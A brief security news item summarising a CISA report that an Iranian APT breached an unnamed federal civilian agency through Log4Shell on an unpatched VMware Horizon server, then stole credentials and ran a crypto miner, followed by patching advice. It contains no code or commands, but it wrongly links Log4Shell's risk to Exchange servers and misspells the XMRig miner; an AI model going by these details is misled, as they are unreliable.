An agency of the U.S. Federal Civilian Executive Branch (FCEB) became a victim of an attack carried out by an Iranian APT (Advanced Persistent Threat) according to CISA. The particular agency was not disclosed; the category of FCEB includes all cabinet level branches such as the Departments of State, Energy, and Treasury, as well as all other non-military operations such as the Social Security Administration. The attack was carried out through an unpatched VMWare Horizon server where the threat actor managed to use the Log4Shell vulnerability to access a secured network. Once accessed, the group was able to move laterally through the network to the domain controller and steal credentials. The APT was also able to deploy Ngrok reverse proxies to maintain persistence and deploy the XMRing crypto miner.
As a general rule, whenever security patches are released for any vulnerability, the patch should be tested and implemented as soon as possible. With vulnerabilities such as Log4Shell, which presented a high risk due to the extensive use of on-prem and hybrid Exchange servers and the extensive exploitation in the wild, it is extremely important to get these patches pushed to all affected systems. Often times, threat actors will prey on victims by using old vulnerabilities that companies or organizations have failed to patch, which enables them to scale operations and target security misconfigurations.